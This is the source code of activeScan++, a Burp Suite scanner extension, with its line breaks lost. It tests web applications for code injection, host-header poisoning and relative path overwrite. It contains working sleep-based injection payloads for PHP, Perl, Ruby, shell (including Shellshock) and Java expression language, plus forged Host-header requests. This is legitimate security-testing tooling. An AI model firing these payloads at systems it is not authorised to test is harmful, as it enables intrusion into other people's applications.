# Author: James Kettle# Copyright 2014 Context Information Security # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from burp import IBurpExtender, IScannerInsertionPointProvider, IScannerInsertionPoint, IParameter, IScannerCheck, IScanIssue import jarray, pickle, random, re, string, time from string import Template from cgi import escape version = "1.0.6" callbacks = None class BurpExtender(IBurpExtender): def registerExtenderCallbacks(self, this_callbacks): global callbacks callbacks = this_callbacks callbacks.setExtensionName("activeScan++") # Register host attack components host = HostAttack(callbacks) callbacks.registerScannerInsertionPointProvider(host) callbacks.registerScannerCheck(host); # Register code exec component callbacks.registerScannerCheck(CodeExec(callbacks)); # Register passive scan component callbacks.registerScannerCheck(PassiveChecks(callbacks)); print "Successfully loaded activeScan++ v"+version return # This extends the active scanner with a number of timing-based code execution checks # _payloads contains the payloads, designed to delay the response by $time seconds # _extensionMappings defines which payloads get called on which file extensions class CodeExec(IScannerCheck): def __init__(self, callbacks): self._helpers = callbacks.getHelpers() self._done = getIssues('Code injection') self._payloads = { # eval() injection 'php':['{$${sleep($time)}}', "'.sleep($time).'", '".sleep($time)."', 'sleep($time)'], 'perl':["'.sleep($time).'", '".sleep($time)."', 'sleep($time)'], 'ruby':["'+sleep($time)+'", '"+sleep($time)+"'], # Exploits shell command injection into '$input' on linux and "$input" on windows: # and CVE-2014-6271 'any':['"&timeout $time&\'`sleep $time`\'', '() { :;}; sleep $time'], # Expression language injection 'java':['$${(new java.io.BufferedReader(new java.io.InputStreamReader(((new java.lang.ProcessBuilder(new java.lang.String[]{"timeout","$time"})).start()).getInputStream()))).readLine()}$${(new java.io.BufferedReader(new java.io.InputStreamReader(((new java.lang.ProcessBuilder(new java.lang.String[]{"sleep","$time"})).start()).getInputStream()))).readLine()}'], } # Used to ensure only appropriate payloads are attempted self._extensionMappings = { 'php5':'php', 'php4':'php', 'php3':'php', 'php':'php', 'pl':'perl', 'cgi':'perl', 'jsp':'java', 'do':'java', 'action':'java', 'rb':'ruby', '':['php','ruby','java'], 'unrecognised':'java', # Code we don't have exploits for 'asp':'any', 'aspx':'any', } def doActiveScan(self, basePair, insertionPoint): if(insertionPoint.getInsertionPointName() == "hosthacker"): return None # Decide which payloads to use based on the file extension, using a set to prevent duplicate payloads payloads = set() languages = self._getLangs(basePair) for lang in languages: new_payloads = self._payloads[lang] payloads |= set(new_payloads) payloads.update(self._payloads['any']) # Time how long each response takes compared to the baseline # Assumes <4 seconds jitter baseTime = 0 for payload in payloads: if(baseTime == 0): baseTime = self._attack(basePair, insertionPoint, payload, 0)[0] if(self._attack(basePair, insertionPoint, payload, 10)[0] > baseTime+6): print "Suspicious delay detected. Confirming it's consistent..." (dummyTime, dummyAttack) = self._attack(basePair, insertionPoint, payload, 0) if(dummyTime < baseTime+4): (timer, attack) = self._attack(basePair, insertionPoint, payload, 10) if(timer > dummyTime+6): print "Code execution confirmed" url = self._helpers.analyzeRequest(attack).getUrl() if(url in self._done): break self._done.append(url) return [CustomScanIssue(attack.getHttpService(), url, [dummyAttack, attack], 'Code injection', "The application appears to evaluate user input as code. It was instructed to sleep for 0 seconds, and a response time of "+str(dummyTime)+" seconds was observed.
It was then instructed to sleep for 10 seconds, which resulted in a response time of "+str(timer)+" seconds", 'Firm', 'High')] return None def _getLangs(self, basePair): ext = self._helpers.analyzeRequest(basePair).getUrl().getPath().split('.')[-1] if(ext in self._extensionMappings): code = self._extensionMappings[ext] else: code = self._extensionMappings['unrecognised'] if(isinstance(code, basestring)): code = [code] return code def _attack(self, basePair, insertionPoint, payload, sleeptime): payload = Template(payload).substitute(time=sleeptime) # Use a hack to time the request. This information should be accessible via the API eventually. timer = time.time() attack = callbacks.makeHttpRequest(basePair.getHttpService(), insertionPoint.buildRequest(payload)) timer = time.time() - timer print "Response time: "+str(round(timer, 2)) + "| Payload: "+payload requestHighlights = insertionPoint.getPayloadOffsets(payload) if(not isinstance(requestHighlights, list)): requestHighlights = [requestHighlights] attack = callbacks.applyMarkers(attack, requestHighlights, None) return (timer, attack) class HostAttack(IScannerInsertionPointProvider, IScannerCheck): def __init__(self, callbacks): self._helpers = callbacks.getHelpers() self._referer = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(6)) # Load previously identified scanner issues to prevent duplicates self._rebind = map(lambda i: i.getAuthority(), getIssues('Arbitrary host header accepted')) self._poison = getIssues('Host header poisoning') def getInsertionPoints(self, basePair): rawHeaders = self._helpers.analyzeRequest(basePair.getRequest()).getHeaders() # Parse the headers into a dictionary headers = dict( (header.split(': ')[0].upper(), header.split(': ', 1)[1]) for header in rawHeaders[1:] ) # If the request doesn't use the host header, bail if ('HOST' not in headers.keys()): return None response = self._helpers.bytesToString(basePair.getResponse()) # If the response doesn't reflect the host header we can't identify successful attacks if(headers['HOST'] not in response): print "Skipping host header attacks on this request as the host isn't reflected" return None return [ HostInsertionPoint(self._helpers, basePair, headers) ] def doActiveScan(self, basePair, insertionPoint): # Return if the insertion point isn't the right one if(insertionPoint.getInsertionPointName() != "hosthacker"): return None # Return if we've already flagged both issues on this URL url = self._helpers.analyzeRequest(basePair).getUrl() host = url.getAuthority() if(host in self._rebind and url in self._poison): return None # Send a baseline request to learn what the response should look like legit = insertionPoint.getBaseValue() (attack, resp) = self._attack(basePair, insertionPoint, {'host':legit}, legit) baseprint = tagmap(resp) # Send several requests with invalid host headers and observe whether they reach the target application, and whether the host header is reflected taint = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(6)) taint += '.'+legit issues = [] # Host: evil.legit.com (attack, resp) = self._attack(basePair, insertionPoint, {'host':taint}, taint) if(hit(resp, baseprint)): # flag DNS-rebinding if we haven't already, and the page actually has content if(baseprint != '' and host not in self._rebind): issues.append(self._raise(basePair, attack, host, 'dns')) if(taint in resp and url not in self._poison and self._referer not in resp): issues.append(self._raise(basePair, attack, host, 'host')) return issues else: # The application might not be the default VHost, so try an absolute URL: # GET http://legit.com/foo # Host: evil.com (attack, resp) = self._attack(basePair, insertionPoint, {'abshost':legit, 'host':taint}, taint) if(hit(resp, baseprint) and taint in resp and url not in self._poison and self._referer not in resp): issues.append(self._raise(basePair, attack, host, 'abs')) # Host: legit.com # X-Forwarded-Host: evil.com (attack, resp) = self._attack(basePair, insertionPoint, {'host':legit, 'xfh':taint}, taint) if(hit(resp, baseprint) and taint in resp and url not in self._poison and self._referer not in resp): issues.append(self._raise(basePair, attack, host, 'xfh')) return issues def _raise(self, basePair, attack, host, type): service = attack.getHttpService() url = self._helpers.analyzeRequest(attack).getUrl() if(type == 'dns'): title = 'Arbitrary host header accepted' sev = 'Low' conf = 'Certain' desc = """The application appears to be accessible using arbitrary HTTP Host headers.
This is a serious issue if the application is not externally accessible or uses IP-based access restrictions. Attackers can use DNS Rebinding to bypass any IP or firewall based access restrictions that may be in place, by proxying through their target's browser.
Note that modern web browsers' use of DNS pinning does not effectively prevent this attack. The only effective mitigation is server-side: https://bugzilla.mozilla.org/show_bug.cgi?id=689835#c13
Additionally, it may be possible to directly bypass poorly implemented access restrictions by sending a Host header of 'localhost'""" self._rebind.append(host) else: title = 'Host header poisoning' sev = 'Medium' conf = 'Tentative' desc = """The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.
Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.
Resources:""" self._poison.append(url) issue = CustomScanIssue(service, url, [basePair, attack], title, desc, conf, sev) return issue def _attack(self, basePair, insertionPoint, payloads, taint): proto = self._helpers.analyzeRequest(basePair).getUrl().getProtocol()+'://' if('abshost' in payloads): payloads['abshost'] = proto + payloads['abshost'] payloads['referer'] = proto + taint + '/' + self._referer print "Host attack: "+str(payloads) attack = callbacks.makeHttpRequest(basePair.getHttpService(), insertionPoint.buildRequest('hosthacker'+pickle.dumps(payloads))) response = self._helpers.bytesToString(attack.getResponse()) requestHighlights = [jarray.array([m.start(),m.end()], 'i') for m in re.finditer('('+'|'.join(payloads.values())+')', self._helpers.bytesToString(attack.getRequest()))] responseHighlights = [jarray.array([m.start(),m.end()], 'i') for m in re.finditer(taint, response)] attack = callbacks.applyMarkers(attack, requestHighlights, responseHighlights) return (attack, response) # Take input from HostAttack.doActiveScan() and use it to construct a HTTP request class HostInsertionPoint(IScannerInsertionPoint): def __init__(self, helpers, basePair, rawHeaders): self._helpers = helpers self._baseHost = rawHeaders['HOST'] request = self._helpers.bytesToString(basePair.getRequest()) request = request.replace('$', '\$') request = request.replace('/', '$abshost/', 1) # add a cachebust parameter if ('?' in request[0:request.index('\n')]): request = re.sub('(?i)([a-z]+ [^ ]+)', r'\1&cachebust=${cachebust}', request, 1) else: request = re.sub('(?i)([a-z]+ [^ ]+)', r'\1?cachebust=${cachebust}', request, 1) request = re.sub('(?im)^Host: [a-zA-Z0-9-_.:]*', 'Host: ${host}${xfh}', request, 1) if('REFERER' in rawHeaders): request = re.sub('(?im)^Referer: http[s]?://[a-zA-Z0-9-_.:]*', 'Referer: ${referer}', request, 1) if('CACHE-CONTROL' in rawHeaders): request = re.sub('(?im)^Cache-Control: [^\r\n]+', 'Cache-Control: no-cache', request, 1) else: request = request.replace('Host: ${host}${xfh}', 'Host: ${host}${xfh}\r\nCache-Control: no-cache', 1) self._requestTemplate = Template(request) return None def getInsertionPointName(self): return "hosthacker" def getBaseValue(self): return self._baseHost def buildRequest(self, payload): # Drop the attack if it didn't originate from my scanner # This will cause an exception, no available workarounds at this time payload = self._helpers.bytesToString(payload) if(payload[:10] != 'hosthacker'): return None # Load the supplied payloads into the request payloads = pickle.loads(payload[10:]) if 'xfh' in payloads: payloads['xfh'] = "\r\nX-Forwarded-Host: "+payloads['xfh'] for key in ('xfh','abshost','host','referer'): if key not in payloads: payloads[key] = '' # Ensure that the response to our request isn't cached - that could be harmful payloads['cachebust'] = time.time() request = self._requestTemplate.substitute(payloads) return self._helpers.stringToBytes(request) def getPayloadOffsets(self, payload): return None def getInsertionPointType(self): return INS_EXTENSION_PROVIDED class PassiveChecks(IScannerCheck): def __init__(self, callbacks): self._helpers = callbacks.getHelpers() self._rpo = [location(i) for i in getIssues('Relative CSS include')] def doPassiveScan(self, basePair): response = self._helpers.bytesToString(basePair.getResponse()) response = response.splitlines() content_start = response.index('') headers = '\r\n'.join(response[1:content_start]) body = '\r\n'.join(response[content_start+1:]) # List of passive scanning functions checks = [ self.relative_path_overwrite, ] issues = [] for check in checks: issue = check(basePair, headers.lower(), body.lower().strip()) if(issue): issues.append(issue) return issues # Passively detect potential Relative Path Overwrite vulnerabilities # See http://www.thespanner.co.uk/2014/03/21/rpo/'>http://www.thespanner.co.uk/2014/03/21/rpo/ def relative_path_overwrite(self, basePair, headers, body): if(body == ''): return None # Skip if the response isn't HTML or is ludicrously long if(('content-type' in headers and not re.search('content-type: .*?text/', headers)) or len(body) > 50000): return None # Skip if there is a
- http://carlos.bueno.org/2008/06/host-header-injection.html
- http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
]+?rel=["\']stylesheet.*?>)', body) vulnerable_imports = [] for stylesheet in stylesheets: if(re.search('(?i)href=["\'](?!/|http:|https:|data:).*?', stylesheet)): vulnerable_imports.append(escape(stylesheet)) if(vulnerable_imports): url = self._helpers.analyzeRequest(basePair).getUrl() if(location(url) not in self._rpo): self._rpo.append(location(url)) return CustomScanIssue(basePair.getHttpService(), url, [basePair], 'Relative CSS include', "The application uses path-relative stylesheet imports: "+htmllist(vulnerable_imports)+"It may be possible to manipulate this page into loading itself as a stylesheet. If this page displays stored user input or reflects the path, Referer or Cookie headers, it can be used for a Relative Path Overwrite attack. See http://www.thespanner.co.uk/2014/03/21/rpo/ for further details.", 'Tentative', 'High') else: print "Not reporting duplicate RPO on "+str(url) return None class CustomScanIssue(IScanIssue): def __init__(self, httpService, url, httpMessages, name, detail, confidence, severity): self.HttpService = httpService self.Url = url self.HttpMessages = httpMessages self.Name = name self.Detail = detail + '
This issue was reported by ActiveScan++' self.Severity = severity self.Confidence = confidence print "Reported: "+name+" on "+str(url) return def getUrl(self): return self.Url def getIssueName(self): return self.Name def getIssueType(self): return 0 def getSeverity(self): return self.Severity def getConfidence(self): return self.Confidence def getIssueBackground(self): return None def getRemediationBackground(self): return None def getIssueDetail(self): return self.Detail def getRemediationDetail(self): return None def getHttpMessages(self): return self.HttpMessages def getHttpService(self): return self.HttpService # misc utility methods def location(url): return url.getProtocol()+"://"+url.getAuthority() + url.getPath() def htmllist(list): list = [""+item+" " for item in list] return ""+"\n".join(list)+"
" def tagmap(resp): tags = ''.join(re.findall("(?im)(<[a-z]+)", resp)) return tags def hit(resp, baseprint): return (baseprint == tagmap(resp)) # currently unused as .getUrl() ignores the query string def issuesMatch(existingIssue, newIssue): if(existingIssue.getUrl() == newIssue.getUrl() and existingIssue.getIssueName() == newIssue.getIssueName()): return -1 else: return 0 def getIssues(name): prev_reported = filter(lambda i: i.getIssueName() == name, callbacks.getScanIssues('')) return (map(lambda i: i.getUrl(), prev_reported))